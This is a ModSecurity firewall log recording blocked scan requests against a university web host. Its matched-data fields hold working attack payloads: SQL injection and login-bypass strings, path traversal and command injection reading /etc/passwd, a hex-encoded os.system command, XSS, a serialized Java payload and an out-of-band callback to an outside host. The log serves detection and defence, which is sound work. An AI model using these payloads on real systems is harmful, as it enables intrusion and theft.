[Tue Aug 29 11:35:13.380813 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAATUxS4AAAAW"]
[Tue Aug 29 11:35:13.414772 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAT2JSYAAAAz"]
[Tue Aug 29 11:35:14.320283 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAVmuKMAAAAT"]
[Tue Aug 29 11:35:14.354885 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVWQAkAAAAV"]
[Tue Aug 29 11:35:16.246928 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAATxvZoAAAAw"]
[Tue Aug 29 11:35:16.341447 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAVvlGYAAAAe"]
[Tue Aug 29 11:35:16.347618 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAPLwLcAAAAX"]
[Tue Aug 29 11:35:16.403241 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUDQUsAAAA7"]
[Tue Aug 29 11:35:18.503420 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)}} found within ARGS:Language: de{${system(\\x22ls\\x22)}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/mailingupgrade.php"] [unique_id "ZO11hsCo-f0AAASEJZwAAAAE"]
[Tue Aug 29 11:35:18.724612 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:list[fullordering]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:list[fullordering]: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11hsCo-f0AAASEJZ4AAAAE"]
[Tue Aug 29 11:35:20.379704 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO11iMCo-f0AAASHh-EAAAAD"]
[Tue Aug 29 11:35:21.304204 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:vars[1][]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ] found within ARGS_NAMES:vars[1][]: vars[1][]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11icCo-f0AAASEJaEAAAAE"]
[Tue Aug 29 11:35:22.332690 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:bwg_tag_id_bwg_thumbnails_0[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:bwg_tag_id_bwg_thumbnails_0[]: )\\x22 union select 1,2,3,4,5,6,7,concat(md5(999999999), 0x2c, 8),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11isCo-f0AAATUxToAAAAW"]
[Tue Aug 29 11:35:22.353284 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAUXLlAAAABM"]
[Tue Aug 29 11:35:24.308760 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAAUKhCMAAABC"]
[Tue Aug 29 11:35:24.325376 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAAShCcUAAAAi"]
[Tue Aug 29 11:35:25.312623 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAATUxT8AAAAW"]
[Tue Aug 29 11:35:25.319077 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAAUXLlcAAABM"]
[Tue Aug 29 11:35:26.377899 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAVoCBcAAAAY"]
[Tue Aug 29 11:35:27.321553 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAVJXm0AAAAA"]
[Tue Aug 29 11:35:27.376261 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAATge@IAAAAl"]
[Tue Aug 29 11:35:28.314776 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAAVJXm8AAAAA"]
[Tue Aug 29 11:35:29.301485 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAATge@UAAAAl"]
[Tue Aug 29 11:35:29.327905 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAATge@YAAAAl"]
[Tue Aug 29 11:35:30.312905 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUJI1UAAABB"]
[Tue Aug 29 11:35:32.303792 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUUZ-IAAABK"]
[Tue Aug 29 11:35:32.336797 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAUOaX4AAABG"]
[Tue Aug 29 11:35:32.340031 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAATfd6sAAAAk"]
[Tue Aug 29 11:35:33.304322 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAV6LBsAAAAI"]
